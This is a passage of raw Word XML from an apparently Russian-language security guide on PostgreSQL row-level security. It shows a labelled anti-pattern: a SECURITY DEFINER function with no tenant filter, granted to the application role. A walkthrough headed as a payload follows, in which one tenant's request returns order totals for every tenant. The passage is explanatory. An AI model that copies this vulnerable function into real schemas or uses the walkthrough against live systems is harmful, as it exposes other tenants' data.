          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- АНТИПАТТЕРН: SECURITY DEFINER "helper" для admin reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE8F48" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Owner функции: postgres (superuser) — bypass RLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BBAA79" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.get_order_summary(p_status text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E87E4AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS TABLE(total_count bigint, total_amount numeric)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5CE9D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE plpgsql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D829B0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SECURITY DEFINER     -- ← исполняется под postgres → RLS bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4682BD9A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ВНИМАНИЕ: НЕТ явного фильтра по tenant_id внутри функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B0973C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A6ADEB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626AD108" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN QUERY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E216BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT count(*), COALESCE(sum(amount), 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8F5403" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FROM app.orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0796BA87" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE status = p_status;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7E92CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED2A06E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5161939F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276917AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- USAGE на функцию выдан всем application-роли:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BE0452" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT EXECUTE ON FUNCTION app.get_order_summary(text) TO application_user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B8614E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сценарий: разработчик добавил «удобную» функцию для admin-dashboard, которая возвращает aggregate stats. Функция SECURITY DEFINER потому что «нужно читать все tenants для admin reports». Но GRANT EXECUTE дан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>всем</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (включая application_user, которая обычно изолирована per-tenant) — потому что разработчик «забыл» что её можно вызвать из application-кода обычного tenant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D79CAEB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Application-caller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746A948D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/orders/summary/{status}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D1D6BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def order_summary(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0827F1B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    status: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6FF5C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    session: AsyncSession = Depends(get_tenant_session),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0533E0E2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3246E3A4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Любой tenant вызывает функцию</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6497E47D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32258E6A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        text("SELECT * FROM app.get_order_summary(:s)"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D54DC6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        {"s": status},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431599E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBDAE6C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return dict(result.first()._mapping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD942F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — cross-tenant aggregate exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EB06D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /orders/summary/completed (JWT tenant_42)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D729C1C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DB9984" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. application_user сессия с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET jwt.tenant_id = '42'</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139D3166" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT app.get_order_summary('completed')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функция SECURITY DEFINER.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107CE4BC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Context switch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: внутри функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_user = postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (owner функции).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225FA923" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT count(*), sum(amount) FROM app.orders WHERE status = 'completed'</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE856F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_user = postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = owner таблицы app.orders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5D24DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RLS bypass для owner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не включён).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665BF1AC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   SELECT возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ALL orders в БД</w:t>
      </w:r>
      <w:r>
        <w:t>, независимо от tenant_id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705346F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Aggregate count + sum — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>по всем tenants</w:t>
      </w:r>
      <w:r>
        <w:t>, не только tenant 42.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D5AE98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Response: total_count и total_amount </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>по всей БД</w:t>
      </w:r>
      <w:r>
        <w:t>. tenant_42 видит aggregate стат всех tenants, в частности total revenue компании.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3197E0A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (внутри функции):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A921B92" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Caller-side:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42386CA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT app.get_order_summary('completed');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AD40DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ caller: application_user (tenant 42 context)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569D9A2D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773085EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Внутри функции (SECURITY DEFINER → current_user = postgres):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8E4C7C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT count(*), COALESCE(sum(amount), 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D18E8DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM app.orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAA72D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE status = 'completed';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4904E5BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ current_user = postgres (owner таблицы) → RLS bypass</w:t>
      </w:r>
    </w:p>
